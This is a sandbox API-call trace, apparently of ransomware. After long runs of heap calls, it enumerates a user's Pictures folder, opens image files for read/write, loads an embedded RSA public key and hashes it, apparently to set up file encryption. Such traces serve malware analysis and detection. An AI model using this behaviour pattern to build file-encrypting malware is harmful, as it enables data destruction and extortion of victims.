[0193.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.770] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\") returned="tE1LWlZl-CqVZeW gL\\" [0193.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0193.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.771] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0193.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42148 [0193.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.771] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0193.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42148 | out: hHeap=0x6a0000) returned 1 [0193.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.772] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.772] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.772] PathFindFileNameW (pszPath="") returned="" [0193.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.773] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a5430, ftCreationTime.dwHighDateTime=0x1d89d63, ftLastAccessTime.dwLowDateTime=0xc364c3a0, ftLastAccessTime.dwHighDateTime=0x1d8a4e0, ftLastWriteTime.dwLowDateTime=0xc364c3a0, ftLastWriteTime.dwHighDateTime=0x1d8a4e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0193.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.785] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a5430, ftCreationTime.dwHighDateTime=0x1d89d63, ftLastAccessTime.dwLowDateTime=0xc364c3a0, ftLastAccessTime.dwHighDateTime=0x1d8a4e0, ftLastWriteTime.dwLowDateTime=0xc364c3a0, ftLastWriteTime.dwHighDateTime=0x1d8a4e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.785] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7b28fd0, ftCreationTime.dwHighDateTime=0x1d8a48c, ftLastAccessTime.dwLowDateTime=0x1aebd650, ftLastAccessTime.dwHighDateTime=0x1d8a580, ftLastWriteTime.dwLowDateTime=0x1aebd650, ftLastWriteTime.dwHighDateTime=0x1d8a580, nFileSizeHigh=0x0, nFileSizeLow=0x117d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-2oKT.gif", cAlternateFileName="")) returned 1 [0193.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.785] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\-2oKT.gif") returned=".gif" [0193.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\-2oKT.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\-2okt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.789] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=71635) returned 1 [0193.789] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.791] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x117ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.792] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.794] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.794] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x117d3, lpOverlapped=0x0) returned 1 [0193.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.795] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.795] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.795] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.796] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.796] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.796] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.796] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.796] GetLastError () returned 0x0 [0193.796] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.796] CryptReleaseContext 